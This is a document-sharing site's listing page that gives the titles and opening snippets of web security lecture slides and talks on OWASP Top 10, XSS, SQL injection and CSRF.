More informationISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.
1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM
More informationOWASP Top 10 The Ten Most Critical Web Application Security Risks
OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationSecure Coding and Code Review. Berlin : 2012
Secure Coding and Code Review Berlin : 2012 Outline Overview of top vulnerabilities Code review practice Secure design / writing secure code Write some secure code Review a volunteer's code Top Problems
More informationLECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security
Repetition Lect 7 LECT 8 WEB SECURITY Access control Runtime protection Trusted computing Java as basic model for signed code Trusted Computing Group TPM ARM TrustZone Mobile Network security GSM security
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationAguascalientes Local Chapter. Kickoff
Aguascalientes Local Chapter Kickoff juan.gama@owasp.org About Us Chapter Leader Juan Gama Application Security Engineer @ Aspect Security 9+ years in Appsec, Testing, Development Maintainer of OWASP Benchmark
More informationOWASP TOP 10. By: Ilia
OWASP TOP 10 By: Ilia Alshanetsky @iliaa ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado WEB SECURITY THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN WEB
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationCSWAE Certified Secure Web Application Engineer
CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationOWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
More informationCertified Secure Web Application Engineer
Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More information